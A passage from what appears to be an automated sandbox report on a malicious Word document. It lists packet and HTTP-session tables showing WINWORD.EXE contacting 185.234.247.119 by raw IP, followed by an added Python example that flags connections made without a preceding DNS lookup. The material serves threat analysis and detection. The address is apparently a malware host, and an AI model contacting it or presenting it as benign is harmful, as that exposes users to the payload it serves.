Jun 7, 2022 19:44:37.058864117 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.058901072 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.058957100 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.058991909 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.059087992 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.059122086 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.201658010 CEST | 49173 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.435573101 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.463280916 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.463632107 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.473567963 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.501120090 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.501225948 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.536554098 CEST | 49172 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.564064980 CEST | 80 | 49172 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.579617977 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.607300997 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.607443094 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.778932095 CEST | 49172 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.834969997 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:37.863265038 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:37.863425970 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:45:37.891575098 CEST | 49172 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:45:40.323673010 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:45:41.990484953 CEST | 80 | 49173 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:45:41.990658045 CEST | 49173 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:45:41.990782976 CEST | 49173 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:45:42.018299103 CEST | 80 | 49173 | 185.234.247.119 | 192.168.2.22 |
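The "TCP traffic detected without corresponding DNS query" signature and the empty contacted-domains table state the same fact: Word connected to 185.234.247.119 by literal IP. The following Python is an added example, not Joe Sandbox code, that reproduces the check over the three client-initiated flows from the table above. The report contains no DNS data, so the DNS answer list is constructed (the single entry is a hypothetical unrelated lookup); the function and variable names are this example's own.

```python
"""Added example: flag TCP connections whose destination IP no DNS answer in
the capture resolved before the connection started. Not Joe Sandbox code."""
from datetime import datetime


def parse_ts(text: str) -> datetime:
    """Parse the report's packet timestamps ('Jun 7, 2022 19:44:27.159992933 CEST').
    datetime keeps microseconds, so the three nanosecond digits are dropped."""
    stamp = text.replace(" CEST", "")
    head, frac = stamp.rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


# First client packet of each flow in the TCP table above:
# (timestamp, source IP, source port, destination IP, destination port).
FLOWS = [
    ("Jun 7, 2022 19:44:27.159992933 CEST", "192.168.2.22", 49171, "185.234.247.119", 80),
    ("Jun 7, 2022 19:44:32.657025099 CEST", "192.168.2.22", 49172, "185.234.247.119", 80),
    ("Jun 7, 2022 19:44:36.916021109 CEST", "192.168.2.22", 49173, "185.234.247.119", 80),
]

# Constructed DNS answers (time, name, IP). The report records no lookup for
# 185.234.247.119; the one entry here is a hypothetical unrelated answer.
DNS_ANSWERS = [
    ("Jun 7, 2022 19:43:50.000000000 CEST", "updates.example.invalid", "203.0.113.10"),
]


def first_resolution(dns_answers):
    """Map each answered IP to the earliest time a name resolved to it."""
    earliest = {}
    for ts, _name, ip in dns_answers:
        t = parse_ts(ts)
        if ip not in earliest or t < earliest[ip]:
            earliest[ip] = t
    return earliest


def connections_without_dns(flows, dns_answers):
    """Return (dst IP, dst port, src port) for every flow whose destination
    was not resolved by a DNS answer before the connection started."""
    resolved = first_resolution(dns_answers)
    hits = []
    for ts, _src, sport, dst, dport in flows:
        t = parse_ts(ts)
        if dst in resolved and resolved[dst] <= t:
            continue  # name resolved earlier in the capture: ordinary traffic
        hits.append((dst, dport, sport))
    return hits


def summarize(hits):
    """Count flagged flows per destination IP, the form an analyst triages."""
    counts = {}
    for dst, _dport, _sport in hits:
        counts[dst] = counts.get(dst, 0) + 1
    return counts


if __name__ == "__main__":
    flagged = connections_without_dns(FLOWS, DNS_ANSWERS)
    print(summarize(flagged))
```

The ordering check matters: an answer that arrives after the connection does not explain it, which is why the example compares timestamps rather than just membership in the answered set. On a real capture the DNS answers come from the resolver log or the DNS packets of the same pcap; hard-coded IPs in documents, scripts and beacons are the common reason a destination appears here.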
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49171 | 185.234.247.119 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 7, 2022 19:44:27.187803030 CEST | 1 | OUT | |
Jun 7, 2022 19:44:27.215137959 CEST | 2 | IN | |
Jun 7, 2022 19:44:37.030510902 CEST | 4 | OUT | |
Jun 7, 2022 19:44:37.058628082 CEST | 5 | IN |